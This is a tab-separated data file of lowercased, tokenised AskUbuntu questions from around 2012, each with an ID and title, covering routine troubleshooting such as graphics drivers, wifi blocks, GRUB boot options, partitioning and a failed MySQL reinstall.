215084	how to read openjdk 7 documentation ( or other -doc ) packages ?	i have installed openjdk-7-doc but i can not find where to read the documentations of the apis ? e.g . : how to find/read `` string class '' api documentation i prefer gui-based over command-line but i also want to know how to read them with the command-line too .
215089	starting linux in text mode using grub2	for virtual machines i create , as well as on old computers i use , i 'd like to turn off gdm/lightdm in order to get better performance . i do n't like to boot into single user mode ( `` linux single '' ) because using root is a bad practice , and i also prefer to keep an easy way to boot back into graphic mode , so when graphic mode is required , no extra commands would be needed . the way i see as the most useful is to configure grub to show a menu item for `` ubuntu text mode '' in addition to the regular boot and the recovery mode , and set the text mode as default . i tried to do it myself , but grub2 configuration files on /etc/grub.d/ looks too cryptic to me , and /etc/defaults/grub can set booting into text but it does n't seems to allow keeping a menu item for graphical booting as well as setting text or graphics as default , and i prefer to keep the booting process simple to novice users so they wo n't need to mess with starting services manually or editing the kernel boot command line in grub2 . similar threads : http : //askubuntu.com/a/196613/19967 , http : //askubuntu.com/a/79682/19967 - completely remove gui and start it from the command line instead of grub2 menuitems .
215090	amd radeon hd 7670m on ubuntu 11.10	i need to install amd radeon hd 7670m graphic card on ubuntu 11.10 i need a help.. thank you
215093	disk space not detected	i was using windows7 system . to install ubuntu i created partition of 100gb . downloaded ubuntu installer for windows and installed ubuntu . the system is working perfectly fine but it is showing disk space of 20 gb only . where as the drive where ubuntu is installed is 100 gb can any one tell me how can start using remaining 80 gb ? i have tried disks application but could not understand how it is installed/shown
215099	soft-blocked on my wireless interfaces	i have a new laptop with a centrino wireless card . i installed ubuntu on it and all seemed fine until i upgraded the kernel , and rebooted . my wireless stopped working despite toggling the wireless button . rfkill list returns the following : 0 : phy0 : wireless lan soft blocked : yes hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no the hardware switch only toggles the hard blocks . how do i turn off the software blocks ? i have tried rfkill unblock all without success . what next ?
215103	how to configure catfish desktop search tool ?	catfish is my preferred desktop search tool . but by default it uses `` find '' and searches in the `` catfish '' directory . i want it to use `` locate '' and search in `` home '' . how do i change that ? i already searched for a configuration file but did n't find any .
215106	video brightness unreadable on a dell inspiron 9400	i have a dell inspiron 9400 with an nvidia geforce go 7900 gs video card . after upgrading from 12.04 to 12.10 , my video brightness decreased to the point where i can hardly read the screen . i have attempted to change the drivers using settings , but none work . any ideas would be greatly appreciated .
215111	pop-up `` network disconencted '' even though i am connected .	the pop-up with the text `` wired network : disconnected '' is being showed even though i have a fully working connection . this pop-up annoys me so i am wondering if you could turn that pop-up off or something similar . thanks in advance !
215114	can windows filesystem files show different size after being copied on a linux filesystem ?	i copied a folder containing other subfolders , with some thousands of text files inside , from a fat32 usb drive to the desktop of ubuntu . after doing this , i checked the folder properties , to be sure i 've correctly copied all , and i see that the two windows presents the same number of files , but have a difference of 88kb ? can this be due to the filesystem change ? my concern is about the reliability of the copy . any ideas is appreciated . thanks
215116	screen timeout ubuntu 12.10 cinnamon	i am running a fresh install of ubuntu 12.10 with cinnamon , after roughly 10 minutes the screen turns black . i have set `` turn screen off when inactive for : '' to `` never '' or tried high values ( 1h + ) , this does not affect this behaviour . in the dconf-editor i located following entries : org.gnome.settings-daemon.plugins.sleep-display-ac setting to 0 did not have any effect org.gnome.desktop.applications.screensaver.idle-activation-enabled unsetting/unchecking did not have the desired effect org.gnome.desktop.applications.session.idle-delay setting it to 0 or very high values ( 100k ) did not have any effect . do you have any suggestions on how to approach this issue ? cheers peter
215118	desktop items not showing because of compiz live wallpaper	i have installed compiz live wallpaper . it works fine but it does n't show my desktop items . i have to open my home folder and then access them in the ~/desktop folder . how can i get my desktop to show the files and folders ?
215125	disabling dns in juju deployment	i have problem with addresses because i do n't get ip addres after juju status but `` namenode.localdomain '' and i thought maybe if i disable dns server or service that is responsible to naming my nodes in that way , then i get ip address . i must disable dnsmasq ? how can i do that ?
215126	create a partition for installation	is it best to create a separate partition to install ubuntu on , if so how big should it be . i install it onto my big hard drive but when i am in ubuntu i can not access any of the files on that drive as they are all in root .
215127	how to auto-unlock keyring manager in 12.10 ?	how can i auto-unlock the keyring manager in 12.10 ? this answer for 11.10 does n't seem to apply because the keyring manager looks different in 12.10 so i ca n't follow the instructions . i have set up my machine to automatically log in to my account . i do n't mind the lesser security of having the keyring automatically unlocked . ( this is still a home desktop computer of a simple user , not a missile launch system . )
215129	package .net desktop application for ubuntu	is it possible to package a .net application as a .deb package and include mono runtime so the software can be installed automatically and run on ubuntu ?
215131	fan always running	i have an hp laptop pavilion dv619ca ( 8 gb ram ; 64-bit ; i7 ; 256 gb hdd ) . i installed the latest ubuntu 12.10 but the fan is always running and decreasing my battery life . i need to know how to fix it please . thanks a million : d .
215132	can not update to ubuntu 11.10	when i am in the update manager , it says that i have to upgrade ( you will not get any further security fixes or critical updates . please upgrade to a later version of ubuntu linux . ) but when i try , there jumps out a window saying '' authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . '' what shall i do ?
215133	transferring files from os x to an ubuntu server seems to not copy all the data	i have a problem ( or at least i think i have a problem ) that i am facing for a while an have found no solution so far - to be honest , i am not sure if it is a `` real '' problem at all , but i am unsure about that and found nowhere else an answer . that is why i am desperately hoping for some insight from here . the situation is the following : i have an os x work machine ( a mac book air to be precise ) and an ubuntu 12.04 file server . now all i wanted to do is to back up ( a lot ) of data from the os x machine to the server . however , that does not seem to work , as it seems never all the data is transferred - no luck whatever i try . to not make it overly complicated , let 's just concentrate on my music library in /users/me/music/itunes . the recent try i did was to use ftp ( ncftp on the client , vsftpd on ubuntu ) after the ftp put -r itunes i have : on os x : total size 43,09 gb 10289 items on ubuntu : total size 37,58 gb 9293 items why is that so ? this data can not be correct , right ? or am i missing something ? i have tried : smb ( drag and drop the folders ) scp rsync there are always a few gb ( ! ) missing and a whole lot of files ( the number varies , however ) . in my desperation , i even tried to use git ... but alas , in the case of my music library it bails out early as it can not handle that much data . has someone any idea why i seemingly are not able to make a good backup of my files over the network ? am i doing someting wrong ? i understand that sizes may differ from file system to filesystem , but they wont in the gb range , will they ? any ideas how to solve this ? thank you for any hints .
215134	software to track application profile	i am developing a software for number theory investigation , and i am suspicious that is leaking memory . it would be very nice to log the cpu , and ram usage of this program through some application . is there any ? grateful for the attention , yuri s vb .
215135	magic mouse clicking issues	i am using apple magic mouse on ubuntu 12.04 , it is working well most of the time . however , sometimes what should be a simple left-click triggers some weird behaviors , like pasting the content of the clipboard if i click on editable text area . or closing the browser tab when i was just selecting the tab . does any how to fix those issues or at at least where should i be looking at ?
215139	how can i change user permission settings for an application	i am trying to prevent the guest user from accessing software-center ( i know it ca n't install anything , but i do n't even want it to browse ) the file is owned by root and in group root . i run : sudo chmod o= /usr/bin/software-center afterwards i run ls -l and get the following output : lrwxrwxrwx 1 root root 40 sep 10 14:28 /usr/bin/software-center - > ../share software- center/software-center the first part of the output indicates chmod did n't do anything and the second part i do n't understand .
215143	oserror : [ errno 36 ] file name too long	i 'm using rdiff-backup since a long time to pull backups over ssh to the backup-server . recently rdiff-backup crashed with errno 36 . so i deleted the file which had the long name in the source . however , i ca n't get rdiff-backup to work again . i keep getting the following notice : previous backup seems to have failed , regressing destination now . regressing to tue sep 11 02:07:50 2012 exception ' [ errno 36 ] file name too long : ' ... . the file name pointed out here is in the destination . i 've checked the path , and there is no such file . so , the file is not in the source , nor in the destination , but i keep getting this error . i though it might be possible to get completely rid of the last failed backup info , to start from the last working one . that is actually what rdiff-backup is saying . but it keeps on falling over this file which does not exist anymore . any ideas ? is there a database where it gets the info about this file from , and where i can remove it ? thanks !
215146	ubuntu 12.10 nvidia gt555m bumblebee	i have laptop with nvidia gt 555m video card . system ubuntu 12.10 , kernel linux 3.5.0-17-generic step what i do : sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia restart system optirun glxgears this message give me : can not access secondary gpu - error : could not load gpu driver aborting because fallback start is disabled . open sudo gedit /etc/bumblebee/bumblebee.conf and change driver= to driver=nvidia and kerneldriver=nvidia-current to kerneldriver=nvidia . restart the system and run optirun glxgears . this message gives me : the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . could not connect to bumblebee daemon - is it running ? anybody have idea ? !
215151	3 sudo password errors	after upgrading to ubuntu 12.10 , i forgot to disable cap-locks and have attempted to use the wronf sudo password three times . now when i attempt a sudo command , i get a message in part reads `` http request sent , awaiting response ... 200k ok '' . sorry , i do n't know how to add a screen shot to this message . how can i recover my sudo passwore/access ?
215154	extra toolbar installed on my chrome after making an iso image	i have a lenovo x220 . it does n't have a cd/dvd so i used your instructions of using `` pendrive '' usb installer . everything went fine and now i have the iso image on my usb stock . the only thing is that when i downloaded the usb installer a toolbar got installed on my chrome and i do n't know how to get rid of it . i even deleted the usb installer and nothing . instructions appreciated .
215163	wordpress installation on ubuntu 12.10	i am new in ubuntu . recently i am using ubuntu 12.10 . when i used window xp i used wordpress in xampp . the installation press of wordpress in windows xp on xampp is very simple , only copy the downloaded wordpress file on 'htdocs ' folder and change some come on 'wpconfig.php ' , then ready to use . now in ubuntu 12.10 , i using lampp , do the same process as windows xp but do n't works . any suggestion ...
215166	default file system on ubuntu 12.10	why does ubuntu 12.10 default to ext2 file system ? is ext4 not stable enough ?
215170	cinnamon on ubuntu 12.04 stopped working after menu editing	i have recently installed cinnamon on ubuntu 12.04 with success . after installing ms office with wine my menu got messy so i tried to edit it with alacarte . after having found out that alacarte is not the proper way to edit it , i right clicked on the menu icon to edit . after just a few editing steps it breaks and cinnamon stopped working ( no menus , no desktop icons , no applets , no window decoration , nothing ) . now , when i login with cinnamon i just get the background image . i can login with gnome though . i have tried to completely remove cinnamon and nemo and reinstall it but it did n't help . i have no idea of how to get any king of diagnostics so if you ask something please explain how to do it or post a link with explanations . many thanks for the help , i hope i will not need to format the pc again to make it work .
215176	install error wubi 12.10 rev273	keep getting this error when installing wubi 12.10 rev273 11-09 14:16 error tasklist : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 31400a42-f78f-11e0-9f68-e8757c793044 } device partition=f : retval=1 stderr=an error has occurred setting the element data . the request is not supported . stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in call file `` \lib\wubi\backends\win32\backend.py '' , line 697 , in modify_bcd file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command command=c : \windows\sysnative\bcdedit.exe /set { 31400a42-f78f-11e0-9f68-e8757c793044 } device partition=f : retval=1 stderr=an error has occurred setting the element data . the request is not supported . am trying to install in f drive
215180	hardware switch is turned off for networking	my husband is in the hospital and his compaq6510b worked fine for a day with their wifi . the above message appeared when he turned off the computer and changed rooms . help !
215181	no unity after ubuntu 12.10 upgrade	after i upgraded to ubuntu 12.10 from 12.04 , there was low graphics and no unity . just the mouse and the wallpaper . so , i got into the terminal via ctrl+alt+t , launched chrome and searched for a solution . as a result , i tried this : sudo sh amd-driver-installer-12.6-legacy-x86.x86_64.run it did not work . then i tried this : sudo add-apt-repository ppa : makson96/fglrx sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx-legacy it did not work too . i removed the repository , got back the the xorg version to 1.13 , and tried this : sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* xorg-driver-fglrx sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core it did return the screen resolution back , but still no unity . is there something what could i do ? my graphics card is : lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv620 [ mobility radeon hd 3400 series ] the output of lspci -k is vga compatible controller : advanced micro devices [ amd ] nee ati rv620 [ mobility radeon hd 3400 series ] subsystem : sony corporation device 9033 kernel driver in use : radeon kernel modules : radeon
215184	installed nvidia driver , activated it , and now unity is gone . no bars , menus , nothing	i installed the nvidia driver ( installed the ubuntu-x-swat ones , updated them , got the updates for them , installed bumblebee . i restarted everytime i did those steps , so no , i do n't simply need to 'restart x ' . i tried to run things using bumblebee , but bumblebee was like `` ca n't access gpu driver '' . so i ran nvidia-settings , it said the drivers were n't in use , so i ran `` sudo nvidia-xconfig '' , then restarted . now , my login screen looks differently than it did before : it asks me if i want to load : `` gnome , gnome - no effects , cairo dock - gnome , system default , or ubuntu '' when i log in , but worst of all : i no longer have any kind of gnome/unity gui . there are no title bars above any windows , no close/minimize/maximize buttons . the unity bar is gone , and will not show up when i call it . and the top status bar is also no longer there . update : i ended up reinstalling ubuntu , and doing the following : 1 ) installed the linux sources and headers . ( these are required to build the driver ) sudo apt-get install linux-source linux-headers-3.5.0-17-generic 2 ) add a ppa containing recent drivers : ( how recent are these ? ) sudo add-apt-repository ppa : ubuntu-x-swat/x-updates 3 ) add the stable bumblebee releases ppa and install bumblebee using the proprietary nvidia driver : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic and now things work . my graphics card is by default off . if i run glxspheres i get ~50fps , and if i optirun glxspheres i get ~150 fps . when i run nvidia-settings or optirun nvidia-settings , i get this :
215185	can i use the ubuntu 12.10 live cd to resize partions and upgrade from 12.04 ?	i am running a dual boot ubuntu 12.04 installation with windows 7 . i have a 160gb hard drive . currently the partitions are arranged ( shown from left to right on the disk utility ) sda1 ( winre ) 13gb : sda2 ( windows'c ' ) 52gb : sda4 with sda5 and sda6 ( ubuntu 12.04 ) 46gb : sda3 ( windows'd ' ) 49gb . i have downloaded and burnt an ubuntu 12.10 dvd . i want to take space from sda3 and increase the ubuntu partition . sda3 is virtually empty ( only 350mb used ) because i am only using windows for itunes and a very few drivers/programmes that i need occasionally . my question - can i use the ubuntu 12.10 dvd to both change the partition scheme to increase the ubuntu space and upgrade from 12.04 to 12.10 ? if so , can anyone point me to a clear set of instructions ? thanks for any advice .
215186	how to get network drive to work in ubuntu	i have added this line to my /etc/fstab in my ubuntu environment fs-abc-03.abc.mycompany.com : /vol/vol02902/drive /projects/drive nfs intr , nolock 0 0 but after i reboot and i 'cd /projects/drive ' , it said 'path not found ' . what else i need to do/trouble shoot this problem ?
215188	nemo file manager on ubuntu 12.10 ( unity ) ?	linux mint uses nemo file manager ( fork of nautilus ) and how can i use it on ubuntu 12.10 ( unity desktop ) ? is there any problem after install ?
215189	creating floppy drive special devices under quantal	first , i 'd like for the various special devices for different floppy capacities ( like /dev/fd0u720 etc . ) to be available . i tried to adapt some udev rules i found online . i tried this , which i saved as /etc/udev/rules.d/70-persistent-floppy.rules : # change floppy device ownership and permissions # default permissions are 640 , which prevents group users from having write access # first fix primary devices ( /dev/fd0 , /dev/fd1 , etc . ) # also change group ownership from disk to floppy subsystem== '' block '' , kernel== '' fd [ 0-9 ] * '' , group= '' floppy '' , mode= '' 0660 '' # next recreate secondary devices ( /dev/fd0u720 , /dev/fd0u1440 , etc . ) subsystem== '' block '' , kernel== '' fd [ 0-9 ] * '' , action== '' add '' , run+= '' create_floppy_devices -c -t $ attr { cmos } -m % m -m 0660 -g floppy $ root/ % k '' but to no avail . it seems the create_floppy_devices script is n't provided with 12.10 . how do i obtain it ? second : i 'm using mate , and whenever i log in i get a message box saying it tried to mount the drive but failed . how do i disable this ? third ( which is probably related to the second ) : whenever there 's a disk in the drive , the motor wo n't stop spinning . if i do a mdir of it , after it returns , the motor stops , and then starts again . i suspect there 's some process in mate doing this . update : for centos 6 ( who does have a create_floppy_devices program ) the following rules file worked . saved as /etc/udev/rules.d/98-floppy.rules : # change floppy device ownership and permissions # default permissions are 640 , which prevents group users from having write access # first fix primary devices ( /dev/fd0 , /dev/fd1 , etc . ) # also change group ownership from disk to floppy kernel== '' fd [ 0-9 ] * '' , group= '' floppy '' , mode= '' 0660 '' # next recreate secondary devices ( /dev/fd0u720 , /dev/fd0u1440 , etc . ) # drive a : is type 4 ( 1.44mb ) - add other lines for other drives kernel== '' fd0* '' , action== '' add '' , run+= '' /lib/udev/create_floppy_devices -c -t 4 -m % m -m 0660 -g floppy $ root/ % k ''
215190	can i sync evolution 's notes with ubuntu one ?	i am looking for a way to sync evolution 's notes with ubuntu one or google docs . but i can find only three options on notes section of evolution . on this computer caldav on the web < -- can i use this way to keep evolution on a folder of my google docs account ?
215194	wifi is not working on my dell e6400	i installed ubuntu 12.10 on my dell e6400 , everything is working fine , except my wifi . the switch on the laptop is on but still ubuntu does not recognize my wireless adapter . i ran the lspci | grep network command and it shows this : broadcom corporation bcm4322 802.11a/b/g/n wireless
215196	what are -dbg packages for ?	1- what are -dbg packages really for ? 2- is it a good/bad idea to install them for , at least , my preferred applications/packages ? 3- does installing them for my preferred applications/packages helps developers on debugging bugs i may encounter ?
215204	where are the instructions for maas when one does not own the network ?	where are the instructions for maas when one does not own the network ? did i miss it ? i see the instructions for using maas if i own the network and can setup my own dhcp server , but i failed to find the instructions for using maas when i do not own the network . i would like to create a test cloud at work , but the network guys are n't going to allow me to run a dhcp server on their network , how do i do this ? the docs i saw at this url : https : //wiki.ubuntu.com/serverteam/maas claimed to cover the case : you 're experimenting while using someone else 's network : you ca n't allow maas to own the network 's dhcp . but i did not see any instructions for that case . what am i missing ? thanks !
215207	`` work '' tab in `` lubuntu netbook '' session is messed up	i have just upgraded my laptop ( samsung np300e5a , with 15.6 '' 1366x768 lcd ) from lubuntu 12.04 to lubuntu 12.10 ( full reinstall ) . i used to use `` lubuntu netbook '' session ( one of choices that login manager offers ) . it shows installed programs not only in `` start menu '' , but also full screen in tabs : `` internet '' , `` work '' , `` learn '' , `` play '' , `` preferences '' . some of those tabs are divided further , like e.g . `` work '' tab which includes among others `` work > accessories '' and `` work > office '' subcategories ( sub-tabs ) . after installing a few programs lubuntu netbook now has totally messed up `` work '' tab , and only this tab , see screenshot below ( half size ) . for example : abiword is both in `` work '' ( as 'abiword word processor ' ) and `` work > office '' ( as 'abiword ' ) , and they use different icons same with catfish file search ; it is as 'catfish ' with default [ * ] icon in `` work '' , and as 'catfish file search ' in `` work > accessories '' with magnifying glass icon . dvdisaster is shown in `` work '' tab twice , once with larger icon and 'additional error protection for cd/dvd media ' as on mouseover description , and once with smaller icon and 'data loss/scratch/aging protection for cd/dvd media ' as description / hint . there is `` gdebi package installer '' in `` work '' tab instead of in `` preferences '' like `` synaptic '' is . there is 'bash ' , 'bc ' , 'dash ' etc . cluttering `` work '' tab , all with default [ * ] icon . there are no such problems with other tabs . what could be the source of this mess , and how to fix it ? how to remove duplicates and console/commandline applications like 'bash ' from there ?
215208	enable clickpad middle click on ubuntu 12.10	currently running ubuntu 12.10 on my acer aspire s3 ultrabook and i 've been fighting with it trying to get the mouse middle click to use three finger tap on it . i could do this without an issue on 12.04 using this method - macbook pro touchpad optimization 12.04 lts but this does n't work on 12.10 . any help would be greatly appreciated . thanks .
215210	computer , home icons disappear from desktop after reboot	i previously enabled the display of the computer , home , trash , and network servers icons on the desktop on ubuntu 12.04 , probably using myunity . today , i installed a custom icon set and after rebooting , all four icons disappear from the desktop . i switched back to the default icon set , all of this using myunity , and rebooted . the icons are still missing . i can get the icons to reappear by opening dconf editor and disabling the display of icons on the desktop and re-enabling the display of icons . i can also get them to show up by killing nautilus and restarting it . they again disappear after reboot , regardless of the icon set selected . i 've tried deleting all of the nautilus , unity , and compiz configuration folders and running the -- reset options as appropriate for each from the command line . i 'm running out of ideas to fix this issue . any thoughts ?
215215	anything sync daemon for ubuntu ?	is there a utility providing similar functionality to anything sync daemon for 64bit ubuntu ? preferably in the repository or with a ppa . in particular , i 'd like to stop firefox from constantly waking my disk up so even an equivalent to the profile sync daemon would suffice .
215218	radeon 9800 pro driver ubuntu 12.04	i 'm new to askubuntu and i have a question that i cant seem to find an answer for . i may be getting a ati radeon 9800 pro ( unless some one can recommend me a better card ) i would like to know if the card has good drivers on ubuntu 12.04 because my older card does n't have proprietary drivers in 12.04 but they were in my previous os 11.10 . i would be using the card for steam , tf2 maybe amnesia ( if i 've got the stomach for it ) this would be for a low end build , amd athlon 3300+ and 1 or 2gb of ram . based on that list of parts could some one suggest a better card , if the 9800 pro is good or if there are drivers or not for the card on 12.04 . ( i think i forgot something but we 'll cross that bridge when we get to it )
215219	ca n't open a separate usbdrive when booting from a liveusb install 12.10	my problem is using a separate flash drive when running from my live usb of ubuntu 12.10 . the problem is that when i choose to try ubuntu from this usb drive it no longer lets me access my other flash drive . it automatically sets it to part of the live usb but it 's a completely separate flash drive.ubuntu loads fine and everything but when i go to access my other flash drive nothing happens . when i try to open it from the home folder it gives me unable to mount 3.5 volume adding read acl for uid 999 to media/ubuntu failed : operation not supported message . my live usb is on a 8gb flash drive and my other flash drive is 4g .
215224	12.10 wo n't boot	i have just installed 12.10 on an external hd alongside 12.04 but when i boot it defaults to 12.04 . when i press f12 to change the boot sequence it defaults to the external hd but only allows me to boot 12.04
215226	broadcom bcm43228 802.11a/b/g/n wireless adapter stopped working on update	i installed ubuntu 12.04 on my acer laptop ( network controller : broadcom corporation bcm43228 802.11a/b/g/n ) and everything was just fine . in some point ( maybe after i installed some updates ) the wireless adapter stopped working . there are lots of people have this problem too , but i looked through lots of answers and still not working . re-installing the bcmwl-kernel-source did n't work either . what should i do thanks
215230	how to install flash for windows application with crossover or wine ?	i am currently using crossover to run windows application . it is a flash application compiled to .exe . i ran the application and it shows , '' failed to load flash player '' how do i fix that problem ? i am quite sure that you guys have this problem too . if you need more information , please ask below . if you do not understand , you might want to see a screenshot of the problem , or just comment to ask further question . screenshot : http : //imgur.com/lthle.png
215234	software ( gnome-package-kit ) has disappeared from gnome shell remix 12.10	software ( gnome-package-kit ) has disappeared from my reinstalled gnome shell remix 12.10 thankful for answers
215242	howto install joomla 2.5 on root on ubuntu server 12.04	can you please do show me how to install joomla on /var/www/ ( root ) folder i do n't want /var/www/joomla and i think i am stuck with how to create permission and too afraid to make writable to public . can you do step by step please ... .
215246	login screen switched to gnome3 when i istalled other desktop environement . ca n't find how to make it go back to unity !	installed ubuntu 12.10 two days ago , and it works perfectly fine ( i 'm impressed ! ) . i wanted to test other desktop environments , so i installed kubuntu , gnome3 , and xubuntu . all of them work fine , but my login screen is now gnome3 ( i preferred unity ) . how can i set the unity login screen to be the default again ?
215247	how to change settings in splice ?	i just installed the game `` splice '' for ubuntu 12.10 from the humble bundle ( via the software center ) ... but the game starts up in a windowed resolution that goes over both of my monitors . how do you get to the settings either in-game or via the file system ? ( i ca n't find either ) .
215249	xubuntu upload photos to facebook or picasa via shotwell	i was able to upload easily when i was using unity or gnome shell environment.. but after switching to full xubuntu 12.10.. the options are missing and i ca n't add them ... anyone know why ?
215257	password authentication problems	i am new to ubuntu , am extremely delighted with the performance and speed , as compared to windows 7-however , i messed up , i think ... when i booted my usb disc , i set a password , as directed , and when ubuntu booted up i tried to reset my password via user accounts to `` none '' . now , the password authentication window prevents me from downloading software , ( audacity and my ubuntu updates . also , i 've tried to boot into grub and the recovery console , as directed ; however , the pc bypasses grub and boots into ubuntu instead . also , when attempting to use the terminal as directed to change the password , i 'm given a password prompt there also . if the problem is on my end , could you email/reset my password ? my pc is an emachines el1358g . i am otherwise happy with ubuntu !
215258	unity launcher refuses to hide	i 've recently upgraded to ubuntu 12.04 and things went surprisingly well so far as i can tell . the one big issue i have right now is that i ca n't get the launcher to hide or dodge windows . i 've gone into appearance / behavior and set the `` hide launcher '' to on , but i 'm getting no launcher hiding love . is there something i might be missing ?
215259	unable to install mysql in ubuntu	i purged my existing mysql-server from ubuntu and re-installed the same . this was due there was an upgrade from my ubuntu and i was unable to start my sql-server . after cleaned up and taking backup of my data , i re-insalled mysql . during installaion i received following message popup . unable to set password for the mysql `` root '' user an error occurred while setting the password for the mysql administrative user . this may have happened because the account already has a password , or because of a communication problem with the mysql server . you should check the account 's password after the package installation . please read the /usr/share/doc/mysql-server-5.5/readme.debian file for more information . â â after the installation was failed , following error were received . 121109 20:36:18 innodb : initializing buffer pool , size = 128.0m 121109 20:36:18 innodb : completed initialization of buffer pool 121109 20:36:18 innodb : highest supported file format is barracuda . 121109 20:36:18 innodb : waiting for the background threads to start 121109 20:36:19 innodb : 1.1.8 started ; log sequence number 2395841 error : 130 incorrect file format 'user' 121109 20:36:19 [ error ] aborting 121109 20:36:19 innodb : starting shutdown ... 121109 20:36:20 innodb : shutdown completed ; log sequence number 2395841 121109 20:36:20 [ note ] /usr/sbin/mysqld : shutdown complete start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
215262	`` dd : /dev/disk4 : permission denied '' error when making liveusb on mac os x	i 'm going through the steps : `` how to create a bootable usb stick on os x '' to install ubuntu on a usb stick , and i keep getting the error : dd : /dev/disk4 : permission denied when i try to run step 8 . i know this is probably a silly little mistake , but i 'm not familiar enough with the terminal to figure it out on my own . anyone out there who could help ? ( i 'm using osx , by the way . )
215266	how to check for missing files in filesystem or directory with bash ( after crash ) ?	after the system unmounted the root partition , i detected that some files are missing in the filesystem . wifi and the gwibber icons disappeared from the indicator applet i am trying to check if other files are missing using the ls program and the locate program , which woks with indexes of a previous state of the filesystem . thus , locate /usr/share/icons/* | xargs ls -d 2 > & 1 > /dev/null serves for that purpose because ls displays an error message for each non-existent file that locate locates ; and i can count the missing files like this : locate /usr/share/icons/* | xargs ls -d 2 > & 1 > /dev/null | wc -l except for the case where filenames have blank spaces in them ; and , not very surprisingly , that is the case with ubuntu ( omg ! ! it is no longer `` forbidden '' like in good old times ) . if , for example , i use : locate /usr/share/* | xargs -i単 ls -d '単 ' 2 > & 1 > /dev/null it is not working because there is some kind of interference in the syntax between the redirections of the standard outputs and the use of the parameter -i . can anyone please help me with this syntax or giving another idea ? edit.- i have eliminated the problem with the blank spaces , but it is not very elegant , like this : locate /usr/share/* | sed -e 's/^/ '' / ' -e 's/ $ / '' / ' | xargs ls -d 2 > & 1 > /dev/null| but i 'm sure there must be many better solutions which i am eager to read .
215267	will apt-get dist-upgrade upgrade my system to newer version ?	i am using ubuntu 12.04 right now . if i use command sudo apt-get dist-upgrade will that upgrade my ubuntu to 12.10 ? does that mean i am not using the lts version after that ? i do n't want to use ubuntu 12.10 because i already tried it and it 's very heavy for my netbook .
215272	what is the recommended partition scheme for my ubuntu server ?	i am going to deploy ubuntu server having following servers on it : bind server dhcp server lamp server openssh server ldap server mongodb database ftp server mail server samba server nfs server in the future , i want to set up openstack for paas . i currently have a raid 5 filesystem with 10tb storage . how should i set up my partition scheme ? i am looking to ensure that i do n't have problems in future and that storage size can be easily expanded . can you suggest a partition scheme giving specific percentage of storage to partitions like / , /boot , /var , /etc ?
215274	modem wo n't respond	modem will not respond in efax-gtk or in minicom after initialization . this modem works fine in windoze , same machine , just switched to ubuntu 12.04 drive by mechanical switch . i can go back and forth , always works in windoze , never in ubuntu . modem will attempt to answer an incoming call , but ca n't be sure about function since i do n't have another modem to call with . in minicom : welcome to minicom 2.5 options : i18n compiled on may 2 2011 , 10:05:24 . port /dev/ttys4 press ctrl-a z for help on special keys nothing further will be shown , no matter what keyboard input , etc . - except it will respond to ctrl-a and z , which are not modem responses in efax-gtk : efax-0.9a : 21:27:23 opened /dev/ttys4 then try to send and wait 5 minutes - no result , so press `` stop '' : efax-0.9a : 21:27:46 failed page /home/roger/documents/libre office/saddleback labs request.pdf.001 modem info ttys4 : *-pci description : pci bridge product : integrated technology express , inc. vendor : integrated technology express , inc. physical id : 0 bus info : pci @ 0000:03:00.0 version : 30 width : 32 bits clock : 33mhz capabilities : pci pm subtractive_decode bus_master cap_list resources : ioport : d000 ( size=4096 ) memory : f7d00000-f7dfffff *-communication description : serial controller product : 56k faxmodem model 5610 vendor : 3com corp , modem division physical id : 1 bus info : pci @ 0000:04:01.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm 16550 cap_list configuration : driver=serial latency=0 resources : irq:17 ioport : d000 ( size=8 ) roger @ roger-desktop : ~ $ sudo wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 ttys4 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttys4 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 115200 baud ttys4 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . modem port scan < *1 > : s5 s6 s7 s8 modem port scan < *1 > : s9 s10 s11 s12 s13 s14 s15 s16 modem port scan < *1 > : s17 s18 s19 s20 s21 s22 s23 s24 modem port scan < *1 > : s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? - ( my caps ) did you configure it properly with setserial ? ok , so ubuntu finds the modem , but does n't find it ! ? which is correct ? i 'm almost ready to believe it 's a kernel problem , except not by intent . i ca n't imagine anyone would intentionally screw that up thinking it 's best for the world ... i 'm not trying to connect to an isp right now , i want to use it with efax-gtk . it worked on 12.04 before one of the later updates which included ubuntu segments as well as others . then it just quit .
215277	create startup terminal program	i would like ubuntu to open up a terminal window and apply the following code upon login : xrandr -- newmode `` 1280x1024_60.00 '' 109.00 1280 1368 1496 1712 1024 1027 1034 1063 -hsync +vsync xrandr -- addmode vga1 1280x1024_60.00 xrandr -- output vga1 -- mode 1280x1024_60.00 i usually have to copy/paste the xrandr lines into terminal manually , just wondering if there was shortcut . i 'm using 12.10 btw . thanks in advance !
